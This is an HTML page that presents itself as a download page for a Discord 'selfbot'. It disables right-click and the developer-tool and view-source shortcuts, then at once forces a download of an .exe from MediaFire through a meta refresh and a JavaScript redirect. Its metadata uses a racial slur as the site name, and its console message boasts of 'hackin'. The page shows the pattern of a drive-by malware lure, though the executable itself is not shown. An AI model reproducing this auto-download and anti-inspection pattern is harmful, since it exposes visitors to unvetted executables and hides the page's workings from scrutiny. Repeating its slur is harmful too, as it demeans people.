<!DOCTYPE html>
<html>
<head>
    <title>Selfbot Download</title>
    <script>
        document.addEventListener('contextmenu', function(e) {
            e.preventDefault();
        });

        document.onkeydown = function(e) {
            if (e.keyCode == 123) {
                return false;
            }
            if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
                return false;
            }
            if (e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)) {
                return false;
            }
            if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
                return false;
            }
            if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
                return false;
            }
        }
    </script>
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="nigger.xyz">
    <meta property="og:url" content="https://www.nigger.xyz">
    <meta property="og:title" content="Selfbot Download 💎 ~ nigger.xyz">
    <meta property="og:description" content="Official Nigger.xyz Selfbot Download">
    <meta property="og:image" content="./files/disord.png">

<meta charset="UTF-8">
<meta http-equiv="refresh" content="0;url=https://download1509.mediafire.com/jg2b1s8iopxg0WHmJKvk2cMBQaUHwgRquZbH2DUo-RCjp2B9hQa6J4iN9uOTfq3y4yt5KR3RtPzTyphVr2XgNpvZOiC2grfHKv4jZPV_D9gciBWYc9bT88pajisauUeUt3WE595JXmewB-OZ2IROMod--D8hwuC-5N1p_tth1YZ3/klvc4tvwz10qayp/CheddlatronSB.exe">
<title>Selfbot Download</title>
<audio id="background-audio" autoplay loop>
    <source src="audio/Lud.ogg" type="audio/ogg">
    Your browser does not support the audio element.
</audio>
</head>
<body>
<script type="text/javascript">
    window.location.href = "https://download1509.mediafire.com/jg2b1s8iopxg0WHmJKvk2cMBQaUHwgRquZbH2DUo-RCjp2B9hQa6J4iN9uOTfq3y4yt5KR3RtPzTyphVr2XgNpvZOiC2grfHKv4jZPV_D9gciBWYc9bT88pajisauUeUt3WE595JXmewB-OZ2IROMod--D8hwuC-5N1p_tth1YZ3/klvc4tvwz10qayp/CheddlatronSB.exe"
</script>
<script>
    document.addEventListener('load', () => {
        var audio = document.getElementById('background-audio');
        audio.play().catch(function(error) {
            console.log("Autoplay was prevented. Now Fartboys hackin yo shi!");
            document.addEventListener('click', function() {
                audio.play();
            }, {once: true});
        });
    });
</script>
<p>You downloaded the <a href="https://download1509.mediafire.com/jg2b1s8iopxg0WHmJKvk2cMBQaUHwgRquZbH2DUo-RCjp2B9hQa6J4iN9uOTfq3y4yt5KR3RtPzTyphVr2XgNpvZOiC2grfHKv4jZPV_D9gciBWYc9bT88pajisauUeUt3WE595JXmewB-OZ2IROMod--D8hwuC-5N1p_tth1YZ3/klvc4tvwz10qayp/CheddlatronSB.exe">Selfbot </a>congrats! Welcome to the sigma club.</p>
</body>
</html>